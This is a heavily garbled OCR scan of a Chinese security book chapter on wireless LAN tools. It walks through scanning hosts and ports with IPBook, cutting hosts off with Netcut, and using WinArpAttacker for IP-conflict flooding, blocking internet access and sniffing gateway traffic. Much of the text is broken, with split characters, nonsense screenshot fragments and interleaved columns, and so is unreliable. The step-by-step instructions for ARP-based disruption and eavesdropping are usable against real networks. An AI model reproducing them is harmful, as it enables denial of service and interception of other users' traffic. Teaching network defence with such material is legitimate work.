a AdobephotoshopCC16_ 32 
We pkskron-oala61p 
EasyBco v2.2.0.182 
Funs_GHOST_Win7 SP1_X86.v2014.01(32 
Ghost Win10_pro_X32_10586_29 
Office 2016 
program Fles 
国 QMDownload 
#4 ~ 


[step 图 在 其 中 选择 需要 设置 为 共享 文件 的 文 
件 夹 后 ， 单 击 “确定 ” 按 钮 ， 即 可 在 “ 设 
置 共 享 资源 ”窗口 中 看 到 添加 的 共享 文件 
夹 ， 如 下 图 所 示 。 


相隔 
EE 
Emm 
ET 


Er 
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[sp 图 在“ 局域网 查看 工具 ”窗口 中 还 可 
以 进行 文件 复制 操作 ， 单 击 “ 搜 索 工具 ” 
栏目 下 的 “搜索 计算 机 ”按钮 ， 即 可 打开 
“搜索 计算 机 ”窗口 ， 在 其 中 即 可 看 到 前 
面 添加 的 共享 文件 夹 ， 如 下 图 所 示 。 


二 ueT HLansee) Y172 红 3 有 到 地 


3 
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[sep 较 在 “网 络 信息 ”栏目 下 可 以 查看 无 
线 局 域 网 中 各 个 主机 的 网 络 信息 。 例 如 单 
击 “ 活 动 端口 ”按钮 后 ， 在 打开 的 “活动 
端口 ” 窗口 中 单 击 “ 刷 新 ”按钮 ， 即 可 


看 到 所 有 主机 中 正在 活动 的 端口 ， 如 下 图 
所 示 。 


TT TN 


[step 图 在 “共享 文件 ”列表 中 右 击 需要 复制 
的 文件 ， 在 弹出 的 快捷 菜单 中 选择 “复制 
文件 ”菜单 命令 ， 即 可 打开 “建立 新 的 复 
制 任务 ”对 话 框 ， 如 下 图 所 示 。 


建立 新 的 复制 任务 吕 


原文 件 2 
Trs Wob 胡 全 开发 实战 ，。 Jers eb 整 癌 开发 实战 


EV = | 
B02 IE 加 
了 


设置 存储 目录 并 选中 “立即 开始 ” 复 
选 框 后 ， 单 击 “ 确 定 ” 按 钮 即 可 开始 复制 
选 定 的 文件 。 此 时 单 击 “ 管 理工 具 ” 栏 目 
下 的 “复制 文件 ”按钮 ， 即 可 打开 “复制 
文件 ”窗口 ， 在 其 中 即 可 看 到 刚才 复制 的 
文件 ， 如 下 图 所 示 。 


EE 


rasan 
息 ， 则 需 单 击 “ 适 配器 信息 ”按钮 ， 即 可 
在 打开 的 “适配器 信息 ”窗口 中 看 到 网 络 
适配器 的 详细 信息 ， 如 下 图 所 示 。 


SAResTaLn 


SC: SRF! DESKTOp.67NQSIF ,和 


[se 本 利用 “局 域 网 查看 工具 ”还 可 以 对 
远程 主机 进行 远程 关机 和 重启 操作 。 单 击 
“管理 工具 ”栏目 下 的 “远程 关机 ” 按 
钮 ， 即 可 打开 “远程 关机 ”窗口 ， 并 单 击 
“导入 计算 机 ”按钮 ， 即 可 导入 整个 局 域 
网 中 所 有 的 主机 ， 选 中 主机 前 面 的 复 选 框 
后 ， 单 击 “ 远 程 关 机 ”按钮 和 “远程 重 
启 ” 按 钮 即 可 分 别 完 成 关闭 和 重启 远程 计 
算 机 的 操作 ， 如 下 图 所 示 。 
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共享 无 线 局 域 网 中 的 文件 。 如 果 想 和 无 线 
局 域 网 中 用 户 聊天 ， 则 需 单 击 “局 域 网 


聊天 ”按钮 ， 即 可 打开 “局 域 网 聊天 ” 窗 
口 ， 如 下 图 所 示 。 
加 ee 
[Eee 本 利用 “局 域 网 查看 工具 ”还 可 以 给 指定 
的 主机 发 送 消息 。 单 击 “ 管 理工 具 ” 栏 
“发 送 消息 ”按钮 ， 即 可 打开 “发 送 消息 ” 窗 和 
口 ， 并 单 击 “ 导 入 计算 机 ”按钮 ， 即 可 导入 整 ER 


个 无 线 局 域 网 中 所 有 的 主机 ， 如 下 图 所 示 。 [Eee 图 在 下 图 的 “发 送信 息 ” 区 域 中 编辑 
0 “| 要 发 送 的 消息 后 ， 单 击 “ 发 送 ” 按 钮 ， 即 
wenz ， 可 将 该 消息 发 送出 去 ， 此 时 在 “局 域 网 聊 
j 天 ”窗口 中 即 可 看 到 发 送 的 消息 ， 该 模式 
人 如 下 图 所 示 。 


消息 ” 0 息 ， 
后 单 击 “ 发 送 ” 按 钮 ， er 
给 仙人 此 时 即 可 看 到 该 主机 的 至、 i 
玉生 在 作法 ;如下 国 所 而。 [图 单 去 “文件 共享 ”按钮 ， 即 可 打开 “ 广 
“| | 件 共享 ”窗口 ， 在 共 中 印 可 搜索 用 户 闪 二 享 、 复 
昼 ， 制 文件 、 添 加 共享 等 操作 ， 如 下 图 所 示 。 


于 
人 
ee. 0 na 有 


PP Kh 
Ee 图 选择 “聊天 工具 ”栏目 ， 在 其 中 既 ee tn 


可 与 无 线 局 域 网 中 用 户 进行 聊天 ， 还 可 以 


和 系 ，DESKTOP .67NQBIF， 
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14.2.2 ”使 用 IPBook 工 具 


IPBook〔〈 超 级 网 络 邻 居 ) 是 一 款 小 巧 
的 搜索 共享 资源 及 FTP 共 享 的 工具 ， 软 件 自 
解压 后 就 能 直接 运行 。 它 还 有 许多 辅助 功 
能 ， 如 发 送 短信 等 ， 并 且 所 有 功能 不 限于 
无 线 局 域 网 ， 可 以 在 互联 网 使 用 ， 使 用 该 
工具 的 具体 操作 步骤 如 下 : 
[step 图 双击 下 载 的 IPBook 应 用 程序 ， 打 开 
“IPBook (超级 网 络 邻 居 ) ” 主 窗口 ， 在 
其 中 即 可 自动 显示 本 机 的 IP 地 址 和 计算 机 
名 ， 其 中 192.168.0.104 和 192.168.0 分 别 是 本 
机 的 I 人 P 地 址 与 本 机 所 处 的 无 线 局 域 网 的 IP 范 
围 ， 如 下 图 所 示 。 


dock REE (ER) -oO x 


一 个 网 了 | 向 并 训 尖 小 "| 的 大 第 困 污 入 | 加 乱 信 村 雪 | 


5 
TL 
| 


HAE 


Tage 
rz 


上 NBSTAT Rosponee From 1521680104 和 于 屿 有、 工 站 各 MA 起 


[sep 贺 在 IPBook 工 具 中 可 以 查看 本 网 段 所 有 
的 计算 机 名 与 共享 资源 。 在 “IPBook ( 超 
级 网 络 邻 居 ) ” 主 窗口 中 ， 单 击 “ 扫 描 一 
个 网 段 ” 按 钮 ， 几 秒 钟 之 后 ， 本 机 所 在 的 
无 线 局 域 网 所 有 在 线 计算 机 的 详细 信息 将 
显示 在 左 侧 列表 框 中 ， 如 下 图 所 示 。 其 中 
包含 IP 地 址 、 计 算 机 名 、 工 作 组 、 信 使 等 


信息 。 


occh ERED (ER = 日 x 
(IRM wmv 
tt | ws| 


志和 国 [192, 153.0 人 扫 漳 一 个 同 了 | 从 关节 类 天 "| 八大 第 轩 泊 拉 | 加 治 信 客 突 | 


ekat [REE | eee rare | st | ssa | MTR ~| 
油 口 。” 同 ;21;125 四 控 出 弟 口 | 回 大 范 卫 将 Pt3 朱 
mE nea 


[eet LE 工人 3 
mm 


jesanzs 在 位 
Eastna，PapfitatebrdamrouDeoanry 


I ES 
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[step 图 在 显示 出 所 有 计算 机 信息 后 ， 单 击 
“点 验 共 享 资源 ”按钮 ， 即 可 查 出 本 网 段 
右 侧 的 树 状 显 示 框 中 ， 如 下 图 所 示 ， 在 搜 
索 之 前 还 可 以 设置 是 否 同时 搜索 HTTP、 
FTP、 隐 藏 共享 服务 等 。 


BSR 
加 9 


Com TABE 


[step 轩 在 IPBook 工 具 中 还 可 以 给 目标 网 

段 发 送 短信 ， 在 “IPBook (超级 网 络 邻 

居 ) ” 主 窗口 中 单 击 “ 短 信和 群发 ”按钮 ， 

即 可 打开 “短信 和 群发” 对话 框 ， 如 下 图 

所 示 。 

二 发 Xx 
目标 网 段 ; [EGG 


厂 群发 短信 给 已 经 搜索 到 的 的 计算 机 


pt 江水 ， 连 绵 不 绝 。 
全 天生 十 搞 款 了 四 ? 顺 完 了 并 子 个 要 乱 扔 ， 乱 扔 要 厦 到 小 朋 


妈 乱 玫 不 到 小 朋友， 磺 到 莹 鱼 也 不 好 啊 * 
kind reguard 


收 信人 : [BRB89X 生 三 自动 使 用 收 信者 的 信介 
发 送 和 人: 旋 的 各 弟 者 厂 自动 使 用 发 信者 的 信介 
取消 部 且 


[step 图 在 “计算 机 区 ”列表 中 选择 某 台 计 
算 机 ， 单 击 Ping 按 钮 ， 即 可 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗 口 看 到 该 命令 的 
运行 结果 ， 如 下 图 所 示 。 根 据 得 到 的 信息 
来 判断 目标 计算 机 的 操作 系统 类 型 。 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


个 -a x 
am_IRm am 四 

EN 

| 葬 国 [192. 163.0 上 二 一 个 由 | 多 点 让 共有 洗 庆 了 | 

医 2EEOITOSEFTTREIETCTTET "| 
| m2 15 加 近 只 | 四 NPY 六 | 


ES=323 


Pr -a x)| 
ete) IIR 四 
38 | | 过 BE 

2135.1 义 革 省 一 人 PR | 加 并 字 交 送 | 人 大 到 本 | 到 每 信 沁 | 


La 
E 


TCR 
上 
tee a0 tos PESFTOPECRNGL WOREGFOUP 


emo DEsrToP oFIE WOREOFOUP 

e1530108 。 网 病人 RSROUP 

ao oseanss 。 WRESFOUP mn 
215804 APOGTIET Wor Er 
ee a0 0 

1 


ER 


waPFERCUP 
OFFERCUP 
OFEERCUP 
waRKDRCUP 


国 在 计算 机 区 列表 中 选择 某 台 计算 机 ， 
单 击 Nbtstat 按 钮 ， 即 可 在 “IPBook (超级 
网 络 邻 居 ) ” 主 窗口 看 到 该 主机 的 计算 机 
名 称 ， 如 下 图 所 示 。 


€ Pook 下 (ORR) <- 记 - 训 
kW 工 RM RD 
{3 | | wpe | 
| em loz lt 0 


Em EA 


| 由 FS RE 0 TI 本 pire mhtarer [sw 并 家 | 回信 | 其 他 后 | 
[于 


N92 1580104 主人 让 地 , 引 


[step 了 图 单 去 “探测 端口 ”按钮 ， 即 可 探测 整 
个 无 线 局 域 网 中 各 个 主机 的 端口 ， 同 时 将 
探测 的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 
所 示 。 

€ ,PEook Er 顺 如 网 疝 各 ) = 0 “XK 


FW) IRVY) BWD 
有 ee ee 


双生 一个 | 次 避 这 其 区 产 | 大 条 灿 杂 | 名 扰 信 嫉 必 | 
Se [ER -| rine | motstat | so #H 享 | 又 8 信 | 其他 T 具 -| 


HE 
E [7 TEL TI 
STR DESK OP EVAN Or SDP 
eo oa D7 OFSRTOP DPE WAKSPOUP 
e010 woonoun 


同村 
OIG ND 


ten CORFSDOUP ET 

os so WORKGPOUP Ee 

TI 

1 人 6010 

m0 

530108 网络 人 CORSPOUp AEF DE AS 
Rapoup 


nl Rem srr or A 


I 


i 
i 

Cmte ben 

row RE PeeFAR Sh FA 


NGSTAT Raspone Fom 132168 108 入 各 半 站 中 委 、 工 作 直 MAC 区 直 各 ， 


step 园 单 击 “共享 ”按钮 ， 即 可 对 指定 的 网 
络 段 的 主机 进行 扫描 ， 并 把 扫描 到 的 共享 
资源 显示 出 来 ， 如 下 图 所 示 。 


€ Paaer E02 AN) = 百 及 
htW 工 am 四 

和 本 | 

| 图 FS 10 I ET 


医 二 TCFTFTTRTIETTTTEETTEES 
全 aa | 大 人 ND 
aeepe 
1 TL | | 
TT 3 
Dns BEARTOP PMO WoO a 
TO 3 rn 


m0 DESKTDP OFFIE OME 


Jmol 。 同时 REGPOUP 
SDH2 FOGETEH OMB 
eta te FOG 。 VONKGFOUP 
ta0 10 
TD 和 
ET > 
Fp OA en AR Sree er = 
i 
ed al 
Nn 
A 
TT 


Estee 图 IPBook 工 具 还 具有 将 域名 转换 为 IP 
地 址 的 功能 ， 在 “IPBook (超级 网 络 邻 
居 ) ” 主 窗口 中 单 击 “ 其 他 工具 ”按钮 ， 
在 弹出 的 快捷 菜单 中 选择 “域名 、 卫 地 址 转 
换 ” 一 “IP 一 Name” 菜 单项 ， 即 可 将 IP 地 
址 转换 为 域名 ， 如 下 图 所 示 。 


282 


TREE ET 


a 


TE 
ET WORKGROUP 
104 YORKGROUP 
WORKGRDUP 
OESATORORNSE WOROROUP 
ed WORKGROUP 
0 下 1211064 。 WODRKGRDLP 
FoIG7D21121 。 WORKGROLP 
RR wonkonntP 
得 
| 
[ W192.158.0.10 人 训 全 于 已 妈 条 开 . 


单 击 “大 范围 端口 扫描 ”按钮 ， 
即 可 打开 “扫描 端口 ”对 话 框 ， 如 下 
图 所 示 。 选 择 “IP 地 址 起 止 范围 ” 单 选 
框 后 ， 将 要 扫描 的 IP 地 址 范围 设置 为 
192.168.000.001~192.168.000.254， 最 后 将 
要 扫描 的 端口 设置 为 80:21。 
HG 
tc 
和 下 下 上 东周 
附近 要 


从 : fim 


到 : fm 


扫 痢 计算 机 《1321600~) 了 
1 到 15801 到 1321580254 共 1 个 网 投 Z54 
台电 重 的 崇 吕 


到 先 Fna 后 连 
并 D 后 二 


[| ah | uw 


Estee 加 单 直 “开始 ”按钮 ， 即 可 对 设 定 IP 地 
址 范围 内 的 主机 进行 扫描 ， 同 时 将 扫描 到 
的 主机 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 


Pook ER 

HW IRM 5 四 

刁 | 数 所 | 深 世 香 舌 | 
了 图 ER 本 CYT EDT 


= 


第 14 章 无 线 局 域 网 的 安全 防护 Se 


如 果 成 功 注册 后 ， 就 可 以 使 用 大 范围 
搜索 功能 来 搜索 任意 范围 的 计算 机 名 、 工 
作 组 、MAC 地 址 及 共享 资源 等 。 


14.3 ”无 线 局 域 网 的 攻击 
黑客 可 以 利用 专门 的 工具 来 攻击 整个 


[ EE 


[See 图 在 使 用 IPBook 工 具 过 程 中 ， 还 可 以 
对 该 软件 的 属性 进行 设置 。 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗 口中 选择 “ 工 
具 ” 一 “选项 ”菜单 项 ， 即 可 打开 “ 设 
置 ” 对 话 框 ， 如 下 图 所 示 。 在 “扫描 设 
置 ” 选 项 卡 下 ， 即 可 进行 “Ping 设 置 ” 和 
“设置 解析 计算 机 名 的 方式 ”属性 。 

设置 4 

[着 ]# 可 | 


Ping 设 置 
TimeOue Fa 
厂 采用 先 Po 后 : 


人 厂 要 覃 时 顺带 搜索 共享 资源 
让 正常 


(nbtatat 


取消 孝 助 


[step 图 选择 “共享 设置 ”选项 卡 ， 在 其 中 可 
设置 最 大 线程 数 、 搜 索 共享 时 的 顺带 搜索 
项 目 等 属性 ， 如 下 图 所 示 。 

be x 

扫 相 设置 天 党 和 ] 


区 一 


最 大 线程 数 


下 列 是 搜索 共享 时 的 顺带 搜索 项 目 


厂 搜索 HTTP 服 务 
厅 搜索 FTP 服 务 
厂 搜索 隐藏 共享 
CE | 珊 


无 线 局 域 网 ， 例 如 使 无 线 局 域 网 中 两 台 计 
算 机 的 耳 地 址 发 生 冲 突 ， 从 而 导致 其 中 的 一 
台 计 算 机 无 法 上 网 。 本 节 将 介绍 几 款 常见 
的 局 域 网 攻击 工具 的 使 用 方法 。 


14.3.1 网 络 剪 刀 手 Netcut 


网 络 前 切 手 Netcut 是 一 款 网 管 必 备 工 
具 ， 可 以 使 无 线 局 域 网 中 任何 主机 断 开 网 络 
连接 。 利 用 ARP 协 议 ， 同 时 也 可 以 看 到 无 线 
局 域 网 内 所 有 主机 的 耳 地 址 。 还 可 以 控制 本 
网 段 内 任意 主机 对 外 网 的 访问 ， 随 意 开 启 或 
关闭 其 Internet 访 问 权 限 ， 而 访问 内 部 LAN 
其 他 机 器 不 存在 任何 问题 。 

该 工具 的 具体 使 用 步骤 如 下 


然后 


[step 回 下 载 并 安装 网 络 剪 刀 手 Netcut， 


双击 其 快捷 图 标 ， 即 可 打开 Netcut 主 窗口 。 
软件 会 自动 搜索 当前 网 段 内 的 所 有 主机 的 
JP 地址、 计算 机 名 以 及 各 自 对 应 的 MAC 地 
址 ， 如 下 图 所 示 。 


[step 图 单 去“ 选择 网 卡 ” 按 钮 ， 打 开 “ 选 
择 网 卡 ” 对 话 框 ， 在 其 中 可 以 选择 搜索 计 
算 机 及 发 送 数 据 包 所 使 用 的 网 卡 ， 如 下 图 
所 示 。 
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| Adapters 
Altansic L2 Fast Ethermnet Controller [Microsoft's 


网 卡 信息 

网 卡 : Atansic L2 Fast Ethemet Controller [Microsofts Packet 
Scheduler] 

物理 地 址 : [00-1E:8C:17.80:85] 

1P 地 址 ; [ig2.168.0.8] 

网 关 : [19216801] 


[Eee 图 在 网 络 剪 刀 手 中 还 可 以 开启 或 关闭 无 
线 局 域 网 内 任意 主机 对 网 关 的 访问 。 在 扫 
描 出 的 主机 列表 中 选中 IP 地 址 为 192.168.0.8 
的 主机 后 ， 单 击 “ 切 断 ” 按 钮 ， 即 可 看 到 
该 主机 的 “ 开 / 关 ”状态 已 经 变 为 “ 关 ”， 
此 时 该 主机 不 能 访问 网 关 ， 也 不 能 打开 网 
页 ， 如 下 图 所 示 。 


再 次 选中 IP 地 址 为 192.168.0.8 的 主机 
后 ， 单 击 “ 恢 复 ” 按 钮 ， 即 可 看 到 该 主机 
的 “ 开 / 关 ”状态 又 重新 变 为 “ 开 ”， 此 时 
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[Step 图 如 果 无 线 局 域 网 中 主机 太 多 ， 可 以 使 
用 该 工具 提供 的 查找 功能 ， 快 速 查看 某 个 主 
机 的 信息 。 在 Netcut 主 窗口 中 单 击 “查找 ” 按 
人 钮 ， 即 可 打开 “查找 ”对 话 框 ， 如 下 图 所 示 。 


[ep 图 在 其 中 的 文本 框 中 输入 要 查找 主机 的 
菜 个 信息 ， 这 里 输入 的 是 IP 地 址 ， 然 后 单 击 
“查找 ”按钮 ， 即 可 在 Netcut 主 窗口 中 快速 
找到 IP 地 址 为 192.168.0.8 的 主机 信息 ， 如 下 
图 所 示 。 


[step 国 利用 网 络 剪 刀 手 的 打印 表 功 能 即 可 查 
看 无 线 局 域 网 中 所 有 主机 的 信息 。 在 Netcut 
主 窗 口中 单 击 “ 打 印 表 ” 按 钮 ， 即 可 打开 
“地 址 表 ” 对 话 框 ， 在 其 中 即 可 看 到 所 在 
无 线 局 域 网 中 所 有 主机 的 MAC 地 址 、IP 地 
址 、 用 户 名 等 信息 ， 如 下 图 所 示 。 


[step 图 在 网 络 剪 刀 手 工具 中 还 可 以 将 某 个 主 
机 的 IP 地 址 设置 成 网 关 IP 地 址 。 在 Netcut 主 
窗口 中 选择 某 台 主机 后 ， 单 二 国 可 | 按 馈 ， 

将 该 IP 地 址 添加 到 “网 关 IP” 列 表 中 ， 如 下 


图 所 示 。 


14.3.2 WinArpAttacker 


WinArpAttacker 是 一 款 功能 强大 的 无 线 
局 域 网 软件 ， 利 用 该 工具 可 以 实现 对 ARP 机 
器 列表 扫描 ; 对 ARP 攻 击 、 主 机 状态 、 本 地 
ARP 表 发 生变 化 等 进行 检测 ， 检 测 其 他 机 
器 的 ARP 监 听 攻 击 ， 并 自动 恢复 正确 的 ARP 
表 ; 把 ARP 数 据 包 保 存 到 文件 ， 发 送 手 工 定 
制 ARP 包 等 。 但 是 该 工具 是 基于 Winpcap 软 
件 , 所 以 在 运行 前 必须 先 安 装 Winpcap 软 件 。 

使 用 WinArpAttacker 工 具 的 具体 操作 步 
又 如 下 : 

下 载 WinArpAttacker 软 件 ， 双 击 其 中 
的 “WinArpAttackerexe” 程 序 ， 即 可 打开 
“WinArpAttacker” 主 窗口 ， 如 下 图 所 示 。 


United - Wirwpatacker 370 =- oOo x 


R 月 由 总 -着 - 闻 党 午 作 用 本 富生 


[Moc aa es 
D268 mio 00-1E-3cAD-13 DESKTOP-S7NG. orine Normal Nomms 本 


证 ER [er 
2017-08-14 T75044 New Hat 


02 
19216803 


Wr 7 
oa TreonmR Heeware so yoo can see end edsrte yeey 


Besdy [1921680104 Mac 00-1E BC-AD-13 GW 9 
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[5] 选择 “扫描 ”一 “高 级 ”菜单 项 ， 
即 可 打开 “扫描 ”对 话 框 ， 从 中 可 以 看 出 
有 “扫描 主机 ”“ 扫 描 网 段 ” “多 网 段 扫 

描 ” 等 3 种 扫描 方式 ， 如 下 图 所 示 。 


5 区 
3 
oi 机 [IO io[ 
多 网 避 丘 扩 
Subnet [Pp Lietnask I 


Do 192.168.0.104 255.255 255, 0 


订 正常 扫 据 厂 反 点 听 扫 措 
扫 _ 指 取消 


[step 图 使 用 “扫描 主机 ”方式 可 以 获得 目 
标 主机 的 MAC 地 址 。 在 “扫描 ”对 话 框 
中 选择 “扫描 主机 ” 单 选 按钮 ， 并 在 后 面 
的 文本 框 中 输入 目标 主机 的 IP 地 址 ， 例 如 
192.168.0.104， 然 后 单 击 “ 扫 描 ” 按 钮 ， 即 


可 获得 该 主机 的 MAC 地 址 ， 如 下 图 所 示 。 
提交 x 
高 织 扫描 
要 报 机 [5 -16 0 100 PF 
三 扫 据 由 段 192 1 Fa 192 168 .0 .254 
多 网 各 扫描 


Subnet [IF Netnash 
Do i92168.0.104 255. 255 255, 0 


民 正常 扫描 厂 反 败 听 扫描 
扫 _ 指 取 消 
[step 国 “扫描 网 段 ” 方 式 可 以 对 指定 IP 段 范 


围 内 的 主机 进行 扫描 。 选 择 “ 扫 描 网 段 ” 
单 选 按钮 后 ， 在 IP 地 址 范围 的 文本 框 中 输入 
扫描 的 卫 地 址 范围 ， 如 下 图 所 示 。 


t=:， x 

5 
rE 机 [Er TT 
6 扫 扩 由 段 192 .166 .0 .1 192 .168 . 0 .254 
三 条 网 段 扫 撕 

Subnet [1F Netmesk 

Do 192.168.0.104 255. 255 255.0 

你 正常 扫 痢 厂 反 败 听 扫描 

取 消 
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step 较 单 击 “扫描 ”按钮 即 可 进行 打 描 
操作 ， 当 扫描 完成 时 会 出 现 一 个 Scaning 
successfully! 对 话 框 ， 如 下 图 所 示 。 


WinArpAttacker x 


Fr Scanning successfully ! 


EGG 图 依次 单 去 “确定 ”按钮 ， 返 回 到 
WinArpAttacker 主 窗口 中 ， 在 其 中 即 可 看 到 
扫描 结果 。 此 时 WinArpAttacker 窗 口 被 分 成 
三 个 部 分 ， 如 下 图 所 示 。 


e 上 面 的 区 域 是 主机 列表 区 ， 主 要 显 
示 无 线 局 域 网 内 的 机 器 了 P、MAC、 
主机 名 、 是 否 在 线 、 是 否 在 监听 、 


是 否 处 于 被 攻击 状态 ， 以 及 ARP 数 
据 包 和 转发 数据 包 统计 信息 等 ; 

e 左下 方 的 第 二 个 区 域 是 检测 事件 显 
示 区 ， 主 要 显示 检测 到 的 主机 状态 
变化 和 攻击 事件 ; 

e 右 下 方 的 区 域 显示 IP 地 址 和 MAC 地 
址 信息 。 

[step 国 在 扫描 结果 中 选中 要 攻击 的 目标 计算 
机 前 面 的 复 选 框 ， 然 后 在 WinArmpAttacker 主 窗 
口中 单 击 “ 攻 击 ” 下 拉 按 钮 ， 在 弹出 的 快 
捷 菜 单 中 选择 任意 选项 就 可 以 对 其 他 计算 
机 进行 攻击 了 ， 如 下 图 所 示 。 
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RE 用 以 下 6 种 攻击 
方式 : 
e 不 断 IP 冲 突 : 不 间断 的 IP 冲 突 攻 
击 ，FLOOD 攻 击 默认 是 一 千 次 ， 可 
以 在 选项 中 改变 这 个 数值 。FLOOD 
攻击 可 使 对 方 机 器 弹出 IP 冲 突 对 话 
框 ， 导 致死 机 ; 
e 禁止 上 网 : 禁止 上 网 ， 可 使 对 方 机 
器 不 能 上 网 ; 
e 定时 IP 冲 突 ; 定时 的 人 P 冲 突 ; 
e 监听 网 关 通 信 : 监听 选 定 机 器 与 网 
关 的 通信 ， 监 听 对 方 机 器 的 上 网 流 
量 。 发 动 攻击 后 用 抓 包 软件 来 抓 包 
看 内 容 ; 
e 监听 主机 通信 : 
器 之 间 的 通信 ; 
e 监听 网 络 通信 : 监听 整个 网 络 任意 
机 器 之 间 的 通信 ， 这 个 功能 过 于 危 
险 ， 可 能 会 把 整个 网 络 搞 乱 ， 建 议 
不 要 乱用 。 
[step 图 如 果 选 择 “IP 冲 突 ” 选 项 ， 即 可 使 目 
标 计算 机 不 断 弹 出 “IP 地 址 与 网 络 上 的 其 他 
系统 有 冲突 ”提示 框 ， 如 下 图 所 示 。 


局 Tindors - 系统 钱 误 x 
IP 地 址 与 网 络 上 的 其 地 系统 有 冲突 。 


监听 选 定 的 几 台 机 


[Step 图 如 果 选 择 “ 禁 止 上 网 ”选项 ， 此 时 在 
WinArpAttacker 主 窗口 就 可 以 看 到 该 主机 的 
“攻击 ”属性 就 变 为 BanGateway， 如 果 想 


停止 攻击 ， 则 需 在 WinArpAttacker 主 窗口 选 
择 “ 攻 击 ” 一 “停止 攻击 ” 菜单 项 进行 停 
止 ， 否 则 将 会 一 直 进行 ， 如 下 图 所 示 。 


WD Unied Winephrackar 370 oO x 


在 WinArpAttacker 主 窗口 中 单 击 “发 
送 ” 按 钮 ， 即 可 打开 “手动 发 送 ARP 包 ” 
对 话 框 ， 在 其 中 设置 目标 硬件 Mac、Arp 方 
向 、 源 硬件 Mac、 目 标 协议 Mac、 源 协议 
Mac、 目 标 IP 和 源 IP 等 属性 后 ， 单 击 “ 发 
送 ” 按 钮 ， 即 可 向 指定 的 主机 发 送 ARP 数 
据 包 ， 如 下 图 所 示 。 


手动 发 送 ARP 包 x 
可 置 IF 冲突 包 
Dat Hardvre mao [TREE 三 An [ee zr 

00-00-00-00-00-( 厂 

00-00-00-00-00-( 厂 pet 好 [0 

00-00-00-00-00 三 srem [0 

0 


Sre Hardvare Nao 


Dst Protocol Nac 


Sre Protoool Mao 


ooo0000 00 00 00 00 00 00 00 00 00 00 00 00 of 
oooooolo og oo 06 04 00 01 00 00 00 00 00 00 0 
|oooooozo oo oo oo oo 00 00 00 00 00 00 


mwp 斗 : 


厂 missble Detect fosture, 
发 _ 送 取消 


[step 轩 在 WinArpAttacker 主 窗口 中 选择 

“设置 ”菜单 项 ， 然 后 在 弹出 的 快捷 菜 
单 中 选择 任意 一 项 即 可 打开 Options 对 话 
框 ， 在 其 中 对 各 个 选项 卡 进 行 设置 ， 如 下 
图 所 示 。 
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Options 基 


过 本 回 | 攻 二 | 更 新 “| 检测 | 分 析 |ARPft 畦 | 全 护 | 


网 阁 本 于 

sn 
ES3 [Atheros L1 Gigabit Ethernet 10/100/100( 
本 机 Ip 192.168.0.104 到 
子 网 拓 码 255.255.255.0 了 可 
相机 MAC [oo-iE-ecAD-13s 
网 关 IP 192.168.0.1 J 
网 关 MAC IF4-83-CD-33-60-73 本 
DNS (a2anal34 
CELITTT 


列 可 | Device\NPF_{82CAC205-4844-4802-8E93-EC6F26B0D70F) 


届 新 


a 


14.3.3 网络 特工 


网 络 特工 可 以 监视 与 主机 相连 Hub 上 所 
有 机 器 收发 的 数据 包 ; 还 可 以 监视 所 有 无 
线 局 域 网 内 的 机 器 上 网 情况 ， 以 对 非法 用 
户 进行 管理 ， 并 使 其 登录 指定 的 IP 网 址 。 

使 用 网 络 特工 的 具体 操作 步骤 如 下 : 
下 载 并 运行 其 中 的 “网 络 特工 .exe” 
程序 ， 即 可 打开 “网 络 特工 ” 主 窗 口 ， 如 下 
图 所 示 。 


Ore FRI =- 日 x 
MI woo 


J 


6 选择 “工具 ”一 “选项 ”菜单 项 ， 
即 可 打开 “选项 ”对 话 框 ， 在 其 中 可 以 设 
置 “启动 ” “全 局 热 键 ”等 属性 ， 如 下 图 
所 示 。 
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选项 3 
「 自动 「 杂 项 
厂 操作 系统 启动 时 自动 运行 程序 [退出 程序 时 需要 密码 验证 
人 程序 启动 时 暗示 系统 托盘 图 标 灰 不 旺 示 广 告 ( 需 要 重新 运行 程序 ) 
人 程序 启动 H 显 示 主 窗口 厂 记 加 不 蜡 示 程序 L060 


“全局 执 刍 
显示 / 兢 藏 主 窗口 执 键 : rl + Shift + At 
厂 热 键 呈 示 主 窗口 时 大 要 密码 验证 


报警 声音 设置 


[ee 图 在 “网 络 特 工 ” 主 窗口 左边 的 列表 
中 单 击 “数据 监视 ”选项 ， 即 可 打开 “ 数 
据 监视 ”窗口 。 在 其 中 设置 要 监视 的 内 容 
后 ， 单 击 “ 开 始 监视 ”按钮 ， 即 可 进行 监 
视 ， 如 下 图 所 示 。 


[@ ene MBI a 


step 国 双击 该 网 段 ， 即 可 在 右边 打开 的 窗口 


中 ， 看 到 刚 设置 的 网 段 中 所 有 的 信息 ， 如 下 
图 所 示 。 


右 击 “ 网 络 管 理 ” 选 项 ， 在 弹出 的 快捷 莱 
单 中 选择 “添加 新 网 段 ” 选 项 ， 即 可 打开 
“添加 新 网 段 ” 对话 框 ， 如 下 图 所 示 。 


FRR XI 
网 段 开始 芋 地 址 168 .0 .2 
网 段 结束 IP 地 址 : 192 .168 . 0 .253 
网 段子 网 搞 码 255 .255 .255 . 0 
网 段 网 关 I? 地 址 192 .166 .0 .1 
E33) ”到 下 


[step 图 在 设置 网 络 的 开始 JP 地址、 结束 IP 地 
址 、 子 网 掩 码 、 网 关 IP 地 址 之 后 ， 单 击 OK 
按钮 ， 即 可 在 “网 络 特工 ” 主 窗口 左边 的 
“网 络 管理 ”选项 中 看 到 新 添加 的 网 段 ， 
如 下 图 所 示 。 
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@ err -RBFI = 
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EE = 
I or 
rE ER Re st 
Mie [ Ee i 
i 
pre | 1 = abal| Roy 
| 
六 rm asem sta 
ta 
es 和 ee 
[step 园 在 “网 络 特 工 ” 主 窗口 左边 的 列表 中 [step 园 单 去 其 中 的 “管理 参数 设置 ”按钮 ， 


即 可 打开 “管理 参数 设置 ”对 话 框 ， 在 其 
中 对 各 个 网 络 参 数 进行 设置 ， 如 下 图 所 示 。 


ES 对 X 
Bad 
使 用 语 kirPttt。 SEE 内， 上行 厂 ”过 下 1 m/s 
官 于 主机 频 苗 ， 一 一 一 | 一 一 每 10.00c 秒 次 管 下 路由 红军 | opt 一 多 
2 
厂 不 目 芭 四 3 经 反例 jp 自 己 不 宏 基尼 软件 各 晶 上 同 。 三 抠 直 中: 物理 地 直 


